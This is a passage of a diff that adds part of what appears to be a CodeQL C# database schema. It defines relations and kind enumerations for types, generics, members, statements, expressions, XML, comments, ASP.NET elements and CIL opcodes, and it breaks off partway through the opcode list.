index: int ref); + +preprocessor_directive_location( + unique int id: @preprocessor_directive ref, + int loc: @location ref); + +preprocessor_directive_compilation( + unique int id: @preprocessor_directive ref, + int compilation: @compilation ref); + +preprocessor_directive_active( + unique int id: @preprocessor_directive ref, + int active: int ref); /* 0: false, 1: true */ + +/** TYPES **/ + +types( + unique int id: @type, + int kind: int ref, + string name: string ref); + +case @type.kind of + 1 = @bool_type +| 2 = @char_type +| 3 = @decimal_type +| 4 = @sbyte_type +| 5 = @short_type +| 6 = @int_type +| 7 = @long_type +| 8 = @byte_type +| 9 = @ushort_type +| 10 = @uint_type +| 11 = @ulong_type +| 12 = @float_type +| 13 = @double_type +| 14 = @enum_type +| 15 = @struct_type +| 17 = @class_type +| 19 = @interface_type +| 20 = @delegate_type +| 21 = @null_type +| 22 = @type_parameter +| 23 = @pointer_type +| 24 = @nullable_type +| 25 = @array_type +| 26 = @void_type +| 27 = @int_ptr_type +| 28 = @uint_ptr_type +| 29 = @dynamic_type +| 30 = @arglist_type +| 31 = @unknown_type +| 32 = @tuple_type +| 33 = @function_pointer_type + ; + +@simple_type = @bool_type | @char_type | @integral_type | @floating_point_type | @decimal_type; +@integral_type = @signed_integral_type | @unsigned_integral_type; +@signed_integral_type = @sbyte_type | @short_type | @int_type | @long_type; +@unsigned_integral_type = @byte_type | @ushort_type | @uint_type | @ulong_type; +@floating_point_type = @float_type | @double_type; +@value_type = @simple_type | @enum_type | @struct_type | @nullable_type | @int_ptr_type + | @uint_ptr_type | @tuple_type; +@ref_type = @class_type | @interface_type | @array_type | @delegate_type | @null_type + | @dynamic_type; +@value_or_ref_type = @value_type | @ref_type; + +typerefs( + unique int id: @typeref, + string name: string ref); + +typeref_type( + int id: @typeref ref, + unique int typeId: @type ref); + +@type_or_ref = @type | @typeref; + +array_element_type( + unique int array: @array_type ref, + int dimension: int ref, + int rank: int ref, + int element: @type_or_ref ref); + +nullable_underlying_type( + unique int nullable: @nullable_type ref, + int underlying: @type_or_ref ref); + +pointer_referent_type( + unique int pointer: @pointer_type ref, + int referent: @type_or_ref ref); + +enum_underlying_type( + unique int enum_id: @enum_type ref, + int underlying_type_id: @type_or_ref ref); + +delegate_return_type( + unique int delegate_id: @delegate_type ref, + int return_type_id: @type_or_ref ref); + +function_pointer_return_type( + unique int function_pointer_id: @function_pointer_type ref, + int return_type_id: @type_or_ref ref); + +extend( + int sub: @type ref, + int super: @type_or_ref ref); + +anonymous_types( + unique int id: @type ref); + +@interface_or_ref = @interface_type | @typeref; + +implement( + int sub: @type ref, + int super: @type_or_ref ref); + +type_location( + int id: @type ref, + int loc: @location ref); + +tuple_underlying_type( + unique int tuple: @tuple_type ref, + int struct: @type_or_ref ref); + +#keyset[tuple, index] +tuple_element( + int tuple: @tuple_type ref, + int index: int ref, + unique int field: @field ref); + +attributes( + unique int id: @attribute, + int kind: int ref, + int type_id: @type_or_ref ref, + int target: @attributable ref); + +case @attribute.kind of + 0 = @attribute_default +| 1 = @attribute_return +| 2 = @attribute_assembly +| 3 = @attribute_module +; + +attribute_location( + int id: @attribute ref, + int loc: @location ref); + +@type_mention_parent = @element | @type_mention; + +type_mention( + unique int id: @type_mention, + int type_id: @type_or_ref ref, + int parent: @type_mention_parent ref); + +type_mention_location( + unique int id: @type_mention ref, + int loc: @location ref); + +@has_type_annotation = @assignable | @type_parameter | @callable | @expr | @delegate_type | @generic | @function_pointer_type; + +/** + * A direct annotation on an entity, for example `string? x;`. + * + * Annotations: + * 2 = reftype is not annotated "!" + * 3 = reftype is annotated "?" + * 4 = readonly ref type / in parameter + * 5 = ref type parameter, return or local variable + * 6 = out parameter + * + * Note that the annotation depends on the element it annotates. + * @assignable: The annotation is on the type of the assignable, for example the variable type. + * @type_parameter: The annotation is on the reftype constraint + * @callable: The annotation is on the return type + * @array_type: The annotation is on the element type + */ +type_annotation(int id: @has_type_annotation ref, int annotation: int ref); + +nullability(unique int nullability: @nullability, int kind: int ref); + +case @nullability.kind of + 0 = @oblivious +| 1 = @not_annotated +| 2 = @annotated +; + +#keyset[parent, index] +nullability_parent(int nullability: @nullability ref, int index: int ref, int parent: @nullability ref) + +type_nullability(int id: @has_type_annotation ref, int nullability: @nullability ref); + +/** + * The nullable flow state of an expression, as determined by Roslyn. + * 0 = none (default, not populated) + * 1 = not null + * 2 = maybe null + */ +expr_flowstate(unique int id: @expr ref, int state: int ref); + +/** GENERICS **/ + +@generic = @type | @method | @local_function; + +type_parameters( + unique int id: @type_parameter ref, + int index: int ref, + int generic_id: @generic ref, + int variance: int ref /* none = 0, out = 1, in = 2 */); + +#keyset[constructed_id, index] +type_arguments( + int id: @type_or_ref ref, + int index: int ref, + int constructed_id: @generic_or_ref ref); + +@generic_or_ref = @generic | @typeref; + +constructed_generic( + unique int constructed: @generic ref, + int generic: @generic_or_ref ref); + +type_parameter_constraints( + unique int id: @type_parameter_constraints, + int param_id: @type_parameter ref); + +type_parameter_constraints_location( + int id: @type_parameter_constraints ref, + int loc: @location ref); + +general_type_parameter_constraints( + int id: @type_parameter_constraints ref, + int kind: int ref /* class = 1, struct = 2, new = 3 */); + +specific_type_parameter_constraints( + int id: @type_parameter_constraints ref, + int base_id: @type_or_ref ref); + +specific_type_parameter_nullability( + int id: @type_parameter_constraints ref, + int base_id: @type_or_ref ref, + int nullability: @nullability ref); + +/** FUNCTION POINTERS */ + +function_pointer_calling_conventions( + int id: @function_pointer_type ref, + int kind: int ref); + +#keyset[id, index] +has_unmanaged_calling_conventions( + int id: @function_pointer_type ref, + int index: int ref, + int conv_id: @type_or_ref ref); + +/** MODIFIERS */ + +@modifiable = @modifiable_direct | @event_accessor; + +@modifiable_direct = @member | @accessor | @local_function | @anonymous_function_expr; + +modifiers( + unique int id: @modifier, + string name: string ref); + +has_modifiers( + int id: @modifiable_direct ref, + int mod_id: @modifier ref); + +compiler_generated(unique int id: @modifiable ref); + +/** MEMBERS **/ + +@member = @method | @constructor | @destructor | @field | @property | @event | @operator | @indexer | @type; + +@named_exprorstmt = @goto_stmt | @labeled_stmt | @expr; + +@virtualizable = @method | @property | @indexer | @event; + +exprorstmt_name( + unique int parent_id: @named_exprorstmt ref, + string name: string ref); + +nested_types( + unique int id: @type ref, + int declaring_type_id: @type ref, + int unbound_id: @type ref); + +properties( + unique int id: @property, + string name: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @property ref); + +property_location( + int id: @property ref, + int loc: @location ref); + +indexers( + unique int id: @indexer, + string name: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @indexer ref); + +indexer_location( + int id: @indexer ref, + int loc: @location ref); + +accessors( + unique int id: @accessor, + int kind: int ref, + string name: string ref, + int declaring_member_id: @member ref, + int unbound_id: @accessor ref); + +case @accessor.kind of + 1 = @getter +| 2 = @setter + ; + +init_only_accessors( + unique int id: @accessor ref); + +accessor_location( + int id: @accessor ref, + int loc: @location ref); + +events( + unique int id: @event, + string name: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @event ref); + +event_location( + int id: @event ref, + int loc: @location ref); + +event_accessors( + unique int id: @event_accessor, + int kind: int ref, + string name: string ref, + int declaring_event_id: @event ref, + int unbound_id: @event_accessor ref); + +case @event_accessor.kind of + 1 = @add_event_accessor +| 2 = @remove_event_accessor + ; + +event_accessor_location( + int id: @event_accessor ref, + int loc: @location ref); + +operators( + unique int id: @operator, + string name: string ref, + string symbol: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @operator ref); + +operator_location( + int id: @operator ref, + int loc: @location ref); + +constant_value( + int id: @variable ref, + string value: string ref); + +/** CALLABLES **/ + +@callable = @method | @constructor | @destructor | @operator | @callable_accessor | @anonymous_function_expr | @local_function; + +@callable_accessor = @accessor | @event_accessor; + +methods( + unique int id: @method, + string name: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @method ref); + +method_location( + int id: @method ref, + int loc: @location ref); + +constructors( + unique int id: @constructor, + string name: string ref, + int declaring_type_id: @type ref, + int unbound_id: @constructor ref); + +constructor_location( + int id: @constructor ref, + int loc: @location ref); + +destructors( + unique int id: @destructor, + string name: string ref, + int declaring_type_id: @type ref, + int unbound_id: @destructor ref); + +destructor_location( + int id: @destructor ref, + int loc: @location ref); + +overrides( + int id: @callable ref, + int base_id: @callable ref); + +explicitly_implements( + int id: @member ref, + int interface_id: @interface_or_ref ref); + +local_functions( + unique int id: @local_function, + string name: string ref, + int return_type: @type ref, + int unbound_id: @local_function ref); + +local_function_stmts( + unique int fn: @local_function_stmt ref, + int stmt: @local_function ref); + +/** VARIABLES **/ + +@variable = @local_scope_variable | @field; + +@local_scope_variable = @local_variable | @parameter; + +fields( + unique int id: @field, + int kind: int ref, + string name: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @field ref); + +case @field.kind of + 1 = @addressable_field +| 2 = @constant + ; + +field_location( + int id: @field ref, + int loc: @location ref); + +localvars( + unique int id: @local_variable, + int kind: int ref, + string name: string ref, + int implicitly_typed: int ref /* 0 = no, 1 = yes */, + int type_id: @type_or_ref ref, + int parent_id: @local_var_decl_expr ref); + +case @local_variable.kind of + 1 = @addressable_local_variable +| 2 = @local_constant +| 3 = @local_variable_ref + ; + +localvar_location( + unique int id: @local_variable ref, + int loc: @location ref); + +@parameterizable = @callable | @delegate_type | @indexer | @function_pointer_type; + +#keyset[name, parent_id] +#keyset[index, parent_id] +params( + unique int id: @parameter, + string name: string ref, + int type_id: @type_or_ref ref, + int index: int ref, + int mode: int ref, /* value = 0, ref = 1, out = 2, array = 3, this = 4 */ + int parent_id: @parameterizable ref, + int unbound_id: @parameter ref); + +param_location( + int id: @parameter ref, + int loc: @location ref); + +/** STATEMENTS **/ + +@exprorstmt_parent = @control_flow_element | @top_level_exprorstmt_parent; + +statements( + unique int id: @stmt, + int kind: int ref); + +#keyset[index, parent] +stmt_parent( + unique int stmt: @stmt ref, + int index: int ref, + int parent: @control_flow_element ref); + +@top_level_stmt_parent = @callable; + +// [index, parent] is not a keyset because the same parent may be compiled multiple times +stmt_parent_top_level( + unique int stmt: @stmt ref, + int index: int ref, + int parent: @top_level_stmt_parent ref); + +case @stmt.kind of + 1 = @block_stmt +| 2 = @expr_stmt +| 3 = @if_stmt +| 4 = @switch_stmt +| 5 = @while_stmt +| 6 = @do_stmt +| 7 = @for_stmt +| 8 = @foreach_stmt +| 9 = @break_stmt +| 10 = @continue_stmt +| 11 = @goto_stmt +| 12 = @goto_case_stmt +| 13 = @goto_default_stmt +| 14 = @throw_stmt +| 15 = @return_stmt +| 16 = @yield_stmt +| 17 = @try_stmt +| 18 = @checked_stmt +| 19 = @unchecked_stmt +| 20 = @lock_stmt +| 21 = @using_block_stmt +| 22 = @var_decl_stmt +| 23 = @const_decl_stmt +| 24 = @empty_stmt +| 25 = @unsafe_stmt +| 26 = @fixed_stmt +| 27 = @label_stmt +| 28 = @catch +| 29 = @case_stmt +| 30 = @local_function_stmt +| 31 = @using_decl_stmt + ; + +@using_stmt = @using_block_stmt | @using_decl_stmt; + +@labeled_stmt = @label_stmt | @case; + +@decl_stmt = @var_decl_stmt | @const_decl_stmt | @using_decl_stmt; + +@cond_stmt = @if_stmt | @switch_stmt; + +@loop_stmt = @while_stmt | @do_stmt | @for_stmt | @foreach_stmt; + +@jump_stmt = @break_stmt | @goto_any_stmt | @continue_stmt | @throw_stmt | @return_stmt + | @yield_stmt; + +@goto_any_stmt = @goto_default_stmt | @goto_case_stmt | @goto_stmt; + + +stmt_location( + unique int id: @stmt ref, + int loc: @location ref); + +catch_type( + unique int catch_id: @catch ref, + int type_id: @type_or_ref ref, + int kind: int ref /* explicit = 1, implicit = 2 */); + +foreach_stmt_info( + unique int id: @foreach_stmt ref, + int kind: int ref /* non-async = 1, async = 2 */); + +@foreach_symbol = @method | @property | @type_or_ref; + +#keyset[id, kind] +foreach_stmt_desugar( + int id: @foreach_stmt ref, + int symbol: @foreach_symbol ref, + int kind: int ref /* GetEnumeratorMethod = 1, CurrentProperty = 2, MoveNextMethod = 3, DisposeMethod = 4, ElementType = 5 */); + +/** EXPRESSIONS **/ + +expressions( + unique int id: @expr, + int kind: int ref, + int type_id: @type_or_ref ref); + +#keyset[index, parent] +expr_parent( + unique int expr: @expr ref, + int index: int ref, + int parent: @control_flow_element ref); + +@top_level_expr_parent = @attribute | @field | @property | @indexer | @parameter | @directive_if | @directive_elif; + +@top_level_exprorstmt_parent = @top_level_expr_parent | @top_level_stmt_parent; + +// [index, parent] is not a keyset because the same parent may be compiled multiple times +expr_parent_top_level( + unique int expr: @expr ref, + int index: int ref, + int parent: @top_level_exprorstmt_parent ref); + +case @expr.kind of +/* literal */ + 1 = @bool_literal_expr +| 2 = @char_literal_expr +| 3 = @decimal_literal_expr +| 4 = @int_literal_expr +| 5 = @long_literal_expr +| 6 = @uint_literal_expr +| 7 = @ulong_literal_expr +| 8 = @float_literal_expr +| 9 = @double_literal_expr +| 10 = @string_literal_expr +| 11 = @null_literal_expr +/* primary & unary */ +| 12 = @this_access_expr +| 13 = @base_access_expr +| 14 = @local_variable_access_expr +| 15 = @parameter_access_expr +| 16 = @field_access_expr +| 17 = @property_access_expr +| 18 = @method_access_expr +| 19 = @event_access_expr +| 20 = @indexer_access_expr +| 21 = @array_access_expr +| 22 = @type_access_expr +| 23 = @typeof_expr +| 24 = @method_invocation_expr +| 25 = @delegate_invocation_expr +| 26 = @operator_invocation_expr +| 27 = @cast_expr +| 28 = @object_creation_expr +| 29 = @explicit_delegate_creation_expr +| 30 = @implicit_delegate_creation_expr +| 31 = @array_creation_expr +| 32 = @default_expr +| 33 = @plus_expr +| 34 = @minus_expr +| 35 = @bit_not_expr +| 36 = @log_not_expr +| 37 = @post_incr_expr +| 38 = @post_decr_expr +| 39 = @pre_incr_expr +| 40 = @pre_decr_expr +/* multiplicative */ +| 41 = @mul_expr +| 42 = @div_expr +| 43 = @rem_expr +/* additive */ +| 44 = @add_expr +| 45 = @sub_expr +/* shift */ +| 46 = @lshift_expr +| 47 = @rshift_expr +/* relational */ +| 48 = @lt_expr +| 49 = @gt_expr +| 50 = @le_expr +| 51 = @ge_expr +/* equality */ +| 52 = @eq_expr +| 53 = @ne_expr +/* logical */ +| 54 = @bit_and_expr +| 55 = @bit_xor_expr +| 56 = @bit_or_expr +| 57 = @log_and_expr +| 58 = @log_or_expr +/* type testing */ +| 59 = @is_expr +| 60 = @as_expr +/* null coalescing */ +| 61 = @null_coalescing_expr +/* conditional */ +| 62 = @conditional_expr +/* assignment */ +| 63 = @simple_assign_expr +| 64 = @assign_add_expr +| 65 = @assign_sub_expr +| 66 = @assign_mul_expr +| 67 = @assign_div_expr +| 68 = @assign_rem_expr +| 69 = @assign_and_expr +| 70 = @assign_xor_expr +| 71 = @assign_or_expr +| 72 = @assign_lshift_expr +| 73 = @assign_rshift_expr +/* more */ +| 74 = @object_init_expr +| 75 = @collection_init_expr +| 76 = @array_init_expr +| 77 = @checked_expr +| 78 = @unchecked_expr +| 79 = @constructor_init_expr +| 80 = @add_event_expr +| 81 = @remove_event_expr +| 82 = @par_expr +| 83 = @local_var_decl_expr +| 84 = @lambda_expr +| 85 = @anonymous_method_expr +| 86 = @namespace_expr +/* dynamic */ +| 92 = @dynamic_element_access_expr +| 93 = @dynamic_member_access_expr +/* unsafe */ +| 100 = @pointer_indirection_expr +| 101 = @address_of_expr +| 102 = @sizeof_expr +/* async */ +| 103 = @await_expr +/* C# 6.0 */ +| 104 = @nameof_expr +| 105 = @interpolated_string_expr +| 106 = @unknown_expr +/* C# 7.0 */ +| 107 = @throw_expr +| 108 = @tuple_expr +| 109 = @local_function_invocation_expr +| 110 = @ref_expr +| 111 = @discard_expr +/* C# 8.0 */ +| 112 = @range_expr +| 113 = @index_expr +| 114 = @switch_expr +| 115 = @recursive_pattern_expr +| 116 = @property_pattern_expr +| 117 = @positional_pattern_expr +| 118 = @switch_case_expr +| 119 = @assign_coalesce_expr +| 120 = @suppress_nullable_warning_expr +| 121 = @namespace_access_expr +/* C# 9.0 */ +| 122 = @lt_pattern_expr +| 123 = @gt_pattern_expr +| 124 = @le_pattern_expr +| 125 = @ge_pattern_expr +| 126 = @not_pattern_expr +| 127 = @and_pattern_expr +| 128 = @or_pattern_expr +| 129 = @function_pointer_invocation_expr +| 130 = @with_expr +/* C# 11.0 */ +| 131 = @list_pattern_expr +| 132 = @slice_pattern_expr +| 133 = @urshift_expr +| 134 = @assign_urshift_expr +/* Preprocessor */ +| 999 = @define_symbol_expr +; + +@switch = @switch_stmt | @switch_expr; +@case = @case_stmt | @switch_case_expr; +@pattern_match = @case | @is_expr; +@unary_pattern_expr = @not_pattern_expr; +@relational_pattern_expr = @gt_pattern_expr | @lt_pattern_expr | @ge_pattern_expr | @le_pattern_expr; +@binary_pattern_expr = @and_pattern_expr | @or_pattern_expr; + +@integer_literal_expr = @int_literal_expr | @long_literal_expr | @uint_literal_expr | @ulong_literal_expr; +@real_literal_expr = @float_literal_expr | @double_literal_expr | @decimal_literal_expr; +@literal_expr = @bool_literal_expr | @char_literal_expr | @integer_literal_expr | @real_literal_expr + | @string_literal_expr | @null_literal_expr; + +@assign_expr = @simple_assign_expr | @assign_op_expr | @local_var_decl_expr; +@assign_op_expr = @assign_arith_expr | @assign_bitwise_expr | @assign_event_expr | @assign_coalesce_expr; +@assign_event_expr = @add_event_expr | @remove_event_expr; + +@assign_arith_expr = @assign_add_expr | @assign_sub_expr | @assign_mul_expr | @assign_div_expr + | @assign_rem_expr +@assign_bitwise_expr = @assign_and_expr | @assign_or_expr | @assign_xor_expr + | @assign_lshift_expr | @assign_rshift_expr | @assign_urshift_expr; + +@member_access_expr = @field_access_expr | @property_access_expr | @indexer_access_expr | @event_access_expr + | @method_access_expr | @type_access_expr | @dynamic_member_access_expr; +@access_expr = @member_access_expr | @this_access_expr | @base_access_expr | @assignable_access_expr | @namespace_access_expr; +@element_access_expr = @indexer_access_expr | @array_access_expr | @dynamic_element_access_expr; + +@local_variable_access = @local_variable_access_expr | @local_var_decl_expr; +@local_scope_variable_access_expr = @parameter_access_expr | @local_variable_access; +@variable_access_expr = @local_scope_variable_access_expr | @field_access_expr; + +@assignable_access_expr = @variable_access_expr | @property_access_expr | @element_access_expr + | @event_access_expr | @dynamic_member_access_expr; + +@objectorcollection_init_expr = @object_init_expr | @collection_init_expr; + +@delegate_creation_expr = @explicit_delegate_creation_expr | @implicit_delegate_creation_expr; + +@bin_arith_op_expr = @mul_expr | @div_expr | @rem_expr | @add_expr | @sub_expr; +@incr_op_expr = @pre_incr_expr | @post_incr_expr; +@decr_op_expr = @pre_decr_expr | @post_decr_expr; +@mut_op_expr = @incr_op_expr | @decr_op_expr; +@un_arith_op_expr = @plus_expr | @minus_expr | @mut_op_expr; +@arith_op_expr = @bin_arith_op_expr | @un_arith_op_expr; + +@ternary_log_op_expr = @conditional_expr; +@bin_log_op_expr = @log_and_expr | @log_or_expr | @null_coalescing_expr; +@un_log_op_expr = @log_not_expr; +@log_expr = @un_log_op_expr | @bin_log_op_expr | @ternary_log_op_expr; + +@bin_bit_op_expr = @bit_and_expr | @bit_or_expr | @bit_xor_expr | @lshift_expr + | @rshift_expr | @urshift_expr; +@un_bit_op_expr = @bit_not_expr; +@bit_expr = @un_bit_op_expr | @bin_bit_op_expr; + +@equality_op_expr = @eq_expr | @ne_expr; +@rel_op_expr = @gt_expr | @lt_expr| @ge_expr | @le_expr; +@comp_expr = @equality_op_expr | @rel_op_expr; + +@op_expr = @assign_expr | @un_op | @bin_op | @ternary_op; + +@ternary_op = @ternary_log_op_expr; +@bin_op = @bin_arith_op_expr | @bin_log_op_expr | @bin_bit_op_expr | @comp_expr; +@un_op = @un_arith_op_expr | @un_log_op_expr | @un_bit_op_expr | @sizeof_expr + | @pointer_indirection_expr | @address_of_expr; + +@anonymous_function_expr = @lambda_expr | @anonymous_method_expr; + +@call = @method_invocation_expr | @constructor_init_expr | @operator_invocation_expr + | @delegate_invocation_expr | @object_creation_expr | @call_access_expr + | @local_function_invocation_expr | @function_pointer_invocation_expr; + +@call_access_expr = @property_access_expr | @event_access_expr | @indexer_access_expr; + +@late_bindable_expr = @dynamic_element_access_expr | @dynamic_member_access_expr + | @object_creation_expr | @method_invocation_expr | @operator_invocation_expr; + +@throw_element = @throw_expr | @throw_stmt; + +@implicitly_typeable_object_creation_expr = @object_creation_expr | @explicit_delegate_creation_expr; + +implicitly_typed_array_creation( + unique int id: @array_creation_expr ref); + +explicitly_sized_array_creation( + unique int id: @array_creation_expr ref); + +stackalloc_array_creation( + unique int id: @array_creation_expr ref); + +implicitly_typed_object_creation( + unique int id: @implicitly_typeable_object_creation_expr ref); + +mutator_invocation_mode( + unique int id: @operator_invocation_expr ref, + int mode: int ref /* prefix = 1, postfix = 2*/); + +expr_compiler_generated( + unique int id: @expr ref); + +expr_value( + unique int id: @expr ref, + string value: string ref); + +expr_call( + unique int caller_id: @expr ref, + int target_id: @callable ref); + +expr_access( + unique int accesser_id: @access_expr ref, + int target_id: @accessible ref); + +@accessible = @method | @assignable | @local_function | @namespace; + +expr_location( + unique int id: @expr ref, + int loc: @location ref); + +dynamic_member_name( + unique int id: @late_bindable_expr ref, + string name: string ref); + +@qualifiable_expr = @member_access_expr + | @method_invocation_expr + | @element_access_expr; + +conditional_access( + unique int id: @qualifiable_expr ref); + +expr_argument( + unique int id: @expr ref, + int mode: int ref); + /* mode is the same as params: value = 0, ref = 1, out = 2 */ + +expr_argument_name( + unique int id: @expr ref, + string name: string ref); + +lambda_expr_return_type( + unique int id: @lambda_expr ref, + int type_id: @type_or_ref ref); + +/** CONTROL/DATA FLOW **/ + +@control_flow_element = @stmt | @expr; + +/* XML Files */ + +xmlEncoding ( + unique int id: @file ref, + string encoding: string ref); + +xmlDTDs( + unique int id: @xmldtd, + string root: string ref, + string publicId: string ref, + string systemId: string ref, + int fileid: @file ref); + +xmlElements( + unique int id: @xmlelement, + string name: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int fileid: @file ref); + +xmlAttrs( + unique int id: @xmlattribute, + int elementid: @xmlelement ref, + string name: string ref, + string value: string ref, + int idx: int ref, + int fileid: @file ref); + +xmlNs( + int id: @xmlnamespace, + string prefixName: string ref, + string URI: string ref, + int fileid: @file ref); + +xmlHasNs( + int elementId: @xmlnamespaceable ref, + int nsId: @xmlnamespace ref, + int fileid: @file ref); + +xmlComments( + unique int id: @xmlcomment, + string text: string ref, + int parentid: @xmlparent ref, + int fileid: @file ref); + +xmlChars( + unique int id: @xmlcharacters, + string text: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int isCDATA: int ref, + int fileid: @file ref); + +@xmlparent = @file | @xmlelement; +@xmlnamespaceable = @xmlelement | @xmlattribute; + +xmllocations( + int xmlElement: @xmllocatable ref, + int location: @location_default ref); + +@xmllocatable = @xmlcharacters | @xmlelement | @xmlcomment | @xmlattribute | @xmldtd | @file | @xmlnamespace; + +/* Comments */ + +commentline( + unique int id: @commentline, + int kind: int ref, + string text: string ref, + string rawtext: string ref); + +case @commentline.kind of + 0 = @singlelinecomment +| 1 = @xmldoccomment +| 2 = @multilinecomment; + +commentline_location( + unique int id: @commentline ref, + int loc: @location ref); + +commentblock( + unique int id : @commentblock); + +commentblock_location( + unique int id: @commentblock ref, + int loc: @location ref); + +commentblock_binding( + int id: @commentblock ref, + int entity: @element ref, + int bindtype: int ref); /* 0: Parent, 1: Best, 2: Before, 3: After */ + +commentblock_child( + int id: @commentblock ref, + int commentline: @commentline ref, + int index: int ref); + +/* ASP.NET */ + +case @asp_element.kind of + 0=@asp_close_tag +| 1=@asp_code +| 2=@asp_comment +| 3=@asp_data_binding +| 4=@asp_directive +| 5=@asp_open_tag +| 6=@asp_quoted_string +| 7=@asp_text +| 8=@asp_xml_directive; + +@asp_attribute = @asp_code | @asp_data_binding | @asp_quoted_string; + +asp_elements( + unique int id: @asp_element, + int kind: int ref, + int loc: @location ref); + +asp_comment_server(unique int comment: @asp_comment ref); +asp_code_inline(unique int code: @asp_code ref); +asp_directive_attribute( + int directive: @asp_directive ref, + int index: int ref, + string name: string ref, + int value: @asp_quoted_string ref); +asp_directive_name( + unique int directive: @asp_directive ref, + string name: string ref); +asp_element_body( + unique int element: @asp_element ref, + string body: string ref); +asp_tag_attribute( + int tag: @asp_open_tag ref, + int index: int ref, + string name: string ref, + int attribute: @asp_attribute ref); +asp_tag_name( + unique int tag: @asp_open_tag ref, + string name: string ref); +asp_tag_isempty(int tag: @asp_open_tag ref); + +/* Common Intermediate Language - CIL */ + +case @cil_instruction.opcode of + 0 = @cil_nop +| 1 = @cil_break +| 2 = @cil_ldarg_0 +| 3 = @cil_ldarg_1 +| 4 = @cil_ldarg_2 +| 5 = @cil_ldarg_3 +| 6 = @cil_ldloc_0 +| 7 = @cil_ldloc_1 +| 8 = @cil_ldloc_2 +| 9 = @cil_ldloc_3 +| 10 = @cil_stloc_0 +| 11 = @cil_stloc_1 +| 12 = @cil_stloc_2 +| 13 = @cil_stloc_3 +| 14 = @cil_ldarg_s +| 15 = @cil_ldarga_s +| 16 = @cil_starg_s +| 17 = @cil_ldloc_s +| 18 = @cil_ldloca_s +| 19 = @cil_stloc_s +| 20 = @cil_ldnull +| 21 = @cil_ldc_i4_m1 +| 22 = @cil_ldc_i4_0 +| 23 = @cil_ldc_i4_1 +| 24 = @cil_ldc_i4_2 +| 25 = @cil_ldc_i4_3 +| 26 = @cil_ldc_i4_4 +| 27 = @cil_ldc_i4_5 +| 28 = @cil_ldc_i4_6 +| 29 = @cil_ldc_i4_7 +| 30 = @cil_ldc_i4_8 +| 31 = @cil_ldc_i4_s +| 32 = @cil_ldc_i4 +| 33 = @cil_ldc_i8 +| 34 = @cil_ldc_r4 +| 35 = @cil_ldc_r8 +| 37 = @cil_dup +| 38 = @cil_pop +| 39 = @cil_jmp +| 40 = @cil_call +| 41 = @cil_calli +| 42 = @cil_ret +| 43 = @cil_br_s +| 44 = @cil_brfalse_s +| 45 = @cil_brtrue_s +| 46 = @cil_beq_s +| 47 = @cil_bge_s +| 48 = @cil_bgt_s +| 49 = @cil_ble_s +| 50 = @cil_blt_s +| 51 = @cil_bne_un_s +| 52 = @cil_bge_un_s +| 53 = @cil_bgt_un_s +| 54 = @cil_ble_un_s +| 55 = @cil_blt_un_s +| 56 = @cil_br +| 57 = @cil_brfalse +| 58 = @cil_brtrue +| 59 = @cil_beq +| 60 = @cil_bge +| 61 = @cil_bgt +| 62 = @cil_ble +| 63 = @cil_blt +| 64 = @cil_bne_un +| 65 = @cil_bge_un +| 66 = @cil_bgt_un +| 67 = @cil_ble_un +| 68 = @cil_blt_un +| 69 = @cil_switch +| 70 = @cil_ldind_i1 +| 71 = @cil_ldind_u1 +| 72 = @cil_ldind_i2 +| 73 = @cil_ldind_u2 +| 74 = @cil_ldind_i4 +| 75 = @cil_ldind_u4 +| 76 = @cil_ldind_i8 +| 77 = @cil_ldind_i +| 78 = @cil_ldind_r4 +| 79 = @cil_ldind_r8 +| 80 = @cil_ldind_ref +| 81 = @cil_stind_ref +| 82 = @cil_stind_i1 +| 83 = @cil_stind_i2 +| 84 = @cil_stind_i4 +| 85 = @cil_stind_i8 +| 86 = @cil_stind_r4 +| 87 = @cil_stind_r8 +| 88 = @cil_add +| 89 = @cil_sub +| 90 = @cil_mul +| 91 = @cil_div +| 92 = @cil_div_un +| 93 = @cil_rem +| 94 = @cil_rem_un +| 95 = @cil_and +| 96 = @cil_or +| 97 = @cil_xor +| 98 = @cil_shl +| 99 = @cil_shr +| 100 = @cil_shr_un +| 101 = @cil_neg +| 102 = @cil_not +| 103 = @cil_conv_i1 +| 104 = @cil_conv_i2 +| 105 = @cil_conv_i4 +| 106 = @cil_conv_i8 +| 107 = @cil_conv_r4 +| 108 = @cil_conv_r8 +| 109 = @cil_conv_u4 +| 110 = @cil_conv_u8 +| 111 = @cil_callvirt +| 112 = @cil_cpobj +| 113 = @cil_ldobj +| 114 = @cil_ldstr +| 115 = @cil_newobj +| 116 = @cil_castclass +| 117 = @cil_isinst +| 118 = @cil_conv_r_un +| 121 = @cil_unbox +| 122 = @cil_throw +| 123 = @cil_ldfld +| 124 = @cil_ldflda +| 125 = @cil_stfld +| 126 = @cil_ldsfld +| 127 = @cil_ldsflda +| 128 = @cil_stsfld +| 129 = @cil_stobj +| 130 = @cil_conv_ovf_i1_un +| 131 = @cil_conv_ovf_i2_un +| 132 = @cil_conv_ovf_i4_un +| 133 = @cil_conv_ovf_i8_un +| 134 = @cil_conv_ovf_u1_un +| 135 = @cil_conv_ovf_u2_un +| 136 = @cil_conv_ovf_u4_un +| 137 = @cil_conv_ovf_u8_un +| 138 = @cil_conv_ovf_i_un +| 139 = @cil_conv_ovf_u_un +| 140 = @cil_box +| 141 = @cil_newarr +| 142 = @cil_ldlen +| 143 = @cil_ldelema +| 144 = @cil_ldelem_i1 +| 145 = @cil_ldelem_u1 +| 146 = @cil_ldelem_i2 +| 147 = @cil_ldelem_u2 +| 148 = @cil_ldelem_i4 +| 149 = @cil_ldelem_u4 +| 150 = @cil_ldelem_i8 +| 151 = @cil_ldelem_i +| 152 = @cil_ldelem_r4 +| 153 = @cil_ldelem_r8 +| 154 = @cil_ldelem_ref +| 155 = @cil_stelem_i +| 156 = @cil_stelem_i1 +| 157 = @cil_stelem_i2 +| 158 = @cil_stelem_i4 +| 159 = @cil_stelem_i8 +| 160 = @cil_stelem_r4 +| 161 = @cil_stelem_r8 +| 162 = @cil_stelem_ref +| 163 = @cil_ldelem +| 164 = @cil_stelem +| 165 = @cil_unbox_any +| 179 = 